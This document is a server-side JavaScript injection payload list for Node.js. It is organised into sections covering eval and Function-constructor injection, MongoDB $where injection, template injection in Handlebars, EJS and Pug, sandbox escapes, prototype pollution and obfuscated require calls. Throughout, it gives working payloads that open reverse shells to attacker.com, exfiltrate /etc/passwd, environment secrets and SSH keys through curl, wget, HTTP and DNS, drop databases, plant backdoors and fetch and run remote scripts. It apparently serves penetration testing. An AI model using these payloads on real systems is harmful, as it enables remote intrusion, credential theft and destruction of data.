# Server-Side JavaScript Injection (SSJI) Payloads # ============================================ # 1. BASIC eval() INJECTION # ============================================ # Simple expressions 2+2 Math.random() Date.now() JSON.stringify({}) # Information disclosure process.version process.platform process.arch process.pid process.cwd() process.env global this # File system access require('fs').readFileSync('/etc/passwd', 'utf8') require('fs').readFileSync('/etc/shadow', 'utf8') require('fs').readFileSync('/proc/self/environ', 'utf8') require('fs').readdirSync('/').toString() require('fs').readdirSync('/home').toString() require('fs').readFileSync('package.json', 'utf8') require('fs').readFileSync('.env', 'utf8') # ============================================ # 2. REMOTE CODE EXECUTION (RCE) # ============================================ # Basic command execution require('child_process').execSync('whoami').toString() require('child_process').execSync('id').toString() require('child_process').execSync('pwd').toString() require('child_process').execSync('ls -la').toString() require('child_process').execSync('cat /etc/passwd').toString() require('child_process').execSync('uname -a').toString() # Reverse shell require('child_process').exec('bash -i >& /dev/tcp/attacker.com/4444 0>&1') require('child_process').exec('nc -e /bin/bash attacker.com 4444') require('child_process').spawn('nc', ['-e', '/bin/bash', 'attacker.com', '4444']) # Data exfiltration require('child_process').execSync('curl attacker.com/?data=$(cat /etc/passwd|base64)').toString() require('child_process').execSync('wget --post-file=/etc/passwd attacker.com').toString() # Write backdoor require('fs').writeFileSync('/tmp/backdoor.js', 'malicious code') require('fs').writeFileSync('shell.php', '') # ============================================ # 3. FUNCTION CONSTRUCTOR INJECTION # ============================================ # Basic Function constructor new Function('return 2+2')() new Function('return process.version')() new Function('return require("os").userInfo()')() # RCE via Function constructor new Function('return require("child_process").execSync("whoami").toString()')() new Function('return global.process.mainModule.require("child_process").execSync("id").toString()')() # ============================================ # 4. MONGODB $where INJECTION # ============================================ # Basic MongoDB injection admin' || '1'=='1 ' || true || ' ' || '1'=='1' || ' '; return true; // admin'; return true; // # MongoDB data exfiltration '; return this.password.match(/^a/); // '; return this.email.includes("admin"); // '; return this.role == "admin"; // # MongoDB enumeration '; var users = db.users.find(); return true; // '; db.users.find().forEach(function(u){print(u)}); return true; // # MongoDB command execution (if possible) '; require('child_process').execSync('whoami'); return true; // '; var fs = require('fs'); fs.readFileSync('/etc/passwd'); return true; // # MongoDB DoS '; while(true){}; // '; db.users.drop(); return true; // '; db.dropDatabase(); return true; // # ============================================ # 5. TEMPLATE INJECTION (HANDLEBARS) # ============================================ # Handlebars RCE {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return require('child_process').execSync('whoami');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} # Simplified Handlebars payload {{this}} {{this.constructor}} {{this.constructor.constructor}} # ============================================ # 6. EJS TEMPLATE INJECTION # ============================================ <%= global.process.mainModule.require('child_process').execSync('whoami') %> <%= require('child_process').execSync('cat /etc/passwd').toString() %> <%= global.process.mainModule.require('fs').readFileSync('/etc/passwd', 'utf8') %> <%= process.env %> <%= JSON.stringify(process.env) %> # ============================================ # 7. PUG/JADE TEMPLATE INJECTION # ============================================ #{global.process.mainModule.require('child_process').execSync('id')} #{function(){return require('child_process').execSync('whoami')}()} #{require('child_process').execSync('cat /etc/passwd').toString()} - var x = global.process.mainModule.require('child_process').execSync('ls').toString() = x # ============================================ # 8. VM SANDBOX ESCAPE # ============================================ # Constructor chain escape this.constructor.constructor('return process')() this.constructor.constructor('return global')() ({}).constructor.constructor('return this')() # Process access this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString() (function(){return this.constructor.constructor('return process')()})() ({}).constructor.constructor('return global.process.mainModule.require("child_process").execSync("id").toString()')() # Alternative escapes (function(){return this})().constructor.constructor('return process')() arguments.callee.caller.constructor('return process')() # ============================================ # 9. PROTOTYPE POLLUTION TO RCE # ============================================ # Prototype pollution {"__proto__": {"isAdmin": true}} {"__proto__": {"polluted": "yes"}} {"constructor": {"prototype": {"isAdmin": true}}} # Pollution leading to RCE {"__proto__": {"toString": "require('child_process').execSync('whoami').toString()"}} {"__proto__": {"valueOf": "require('child_process').execSync('id')"}} # ============================================ # 10. SETTIMEOUT/SETINTERVAL INJECTION # ============================================ require('child_process').exec('curl attacker.com/?data=$(whoami)') require('fs').writeFileSync('/tmp/pwned', 'hacked') require('child_process').execSync('nc attacker.com 4444 -e /bin/bash') global.process.exit(1) # ============================================ # 11. REQUIRE VARIATIONS # ============================================ # Direct require require('child_process') require('fs') require('net') require('http') # Global require global.require('child_process') global.process.mainModule.require('child_process') # Module constructor process.mainModule.constructor._load('child_process') global.process.mainModule.constructor._load('fs') # ============================================ # 12. ENVIRONMENT VARIABLE EXFILTRATION # ============================================ process.env JSON.stringify(process.env) process.env.PATH process.env.HOME process.env.USER process.env.SECRET_KEY process.env.DATABASE_URL process.env.API_KEY # ============================================ # 13. FILE READ VARIATIONS # ============================================ # Read sensitive files require('fs').readFileSync('/etc/passwd', 'utf8') require('fs').readFileSync('/etc/shadow', 'utf8') require('fs').readFileSync('/etc/hosts', 'utf8') require('fs').readFileSync('/proc/self/environ', 'utf8') require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf8') require('fs').readFileSync('config/database.yml', 'utf8') require('fs').readFileSync('.env', 'utf8') require('fs').readFileSync('package.json', 'utf8') # Directory listing require('fs').readdirSync('/').toString() require('fs').readdirSync('/etc').toString() require('fs').readdirSync('/home').toString() require('fs').readdirSync('.').toString() # ============================================ # 14. COMMAND INJECTION VIA CHILD_PROCESS # ============================================ # exec variations require('child_process').exec('cat /etc/passwd', (e,o)=>console.log(o)) require('child_process').execSync('whoami').toString() require('child_process').execFileSync('ls', ['-la']).toString() # spawn variations require('child_process').spawn('cat', ['/etc/passwd']) require('child_process').spawnSync('id').stdout.toString() # ============================================ # 15. NETWORK OPERATIONS # ============================================ # HTTP request require('http').get('http://attacker.com/?data=exfiltrated') require('https').get('https://attacker.com/?data=' + process.env.SECRET) # DNS exfiltration require('dns').resolve4(process.env.SECRET + '.attacker.com') # Socket connection require('net').connect(4444, 'attacker.com') # ============================================ # 16. PROCESS MANIPULATION # ============================================ process.exit(1) process.kill(process.pid) process.chdir('/') process.binding('spawn_sync') # ============================================ # 17. CRYPTO MODULE ACCESS # ============================================ require('crypto').randomBytes(16).toString('hex') require('crypto').getHashes() require('crypto').getCiphers() # ============================================ # 18. OS MODULE ACCESS # ============================================ require('os').userInfo() require('os').hostname() require('os').platform() require('os').arch() require('os').cpus() require('os').networkInterfaces() require('os').tmpdir() require('os').homedir() # ============================================ # 19. PATH MODULE FOR TRAVERSAL # ============================================ require('path').resolve('/etc/passwd') require('path').join(__dirname, '../../../etc/passwd') # ============================================ # 20. MONGODB SPECIFIC INJECTIONS # ============================================ # $function aggregation (MongoDB 4.4+) {$function: { body: function() { return require('child_process').execSync('whoami').toString(); }, args: [], lang: "js" }} # mapReduce injection { map: function() { require('child_process').exec('curl attacker.com/?data=pwned'); emit(this._id, 1); }, reduce: function(k, v) { return Array.sum(v); } } # ============================================ # 21. EXPRESS SPECIFIC # ============================================ # res.render with unsafe data <%= user.input %> #{user.input} {{user.input}} # ============================================ # 22. WEBPACK/BUNDLER SPECIFIC # ============================================ __webpack_require__ __non_webpack_require__ # ============================================ # 23. ELECTRON SPECIFIC # ============================================ require('electron').remote.require('child_process') require('electron').ipcRenderer.send('exploit') # ============================================ # 24. OBFUSCATED PAYLOADS # ============================================ # String concatenation req+'uire'('child_'+'process').exec('whoami') # Unicode escaping require('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073') # Hex encoding require(Buffer.from('6368696c645f70726f63657373', 'hex').toString()) # Base64 require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString()) # Computed property access global['pro'+'cess'].mainModule['req'+'uire']('child_process') # ============================================ # 25. NESTING AND CHAINING # ============================================ require('child_process').exec('wget http://attacker.com/shell.sh -O /tmp/s.sh && bash /tmp/s.sh') require('child_process').execSync('curl attacker.com/$(cat /etc/passwd | base64)').toString() # ============================================ # 26. TIME-BASED BLIND SSJI # ============================================ require('child_process').execSync('sleep 5') setTimeout(function(){}, 5000) require('child_process').execSync('ping -c 5 attacker.com') # ============================================ # 27. OUT-OF-BAND DATA EXFILTRATION # ============================================ require('child_process').execSync('curl attacker.com -d "$(cat /etc/passwd)"') require('child_process').execSync('wget --post-data="$(env)" attacker.com') require('child_process').execSync('nslookup $(whoami).attacker.com') # ============================================ # 28. WRITESTREAM FOR PERSISTENCE # ============================================ require('fs').createWriteStream('/tmp/backdoor.js').write('malicious code') # ============================================ # 29. REGEX DOS (ReDoS) via SSJI # ============================================ /(a+)+b/.test('aaaaaaaaaaaaaaaaaaaaaa!') /(a|a)*b/.test('aaaaaaaaaaaaaaaaaaaaaa!') # ============================================ # 30. TESTING PAYLOADS # ============================================ # Detection payloads throw new Error('SSJI Test') console.log('SSJI_TEST_' + Date.now()) require('fs').writeFileSync('/tmp/ssji_test_' + Date.now(), 'test') # Simple arithmetic to confirm execution 7*7 Math.sqrt(16) [1,2,3].join(',')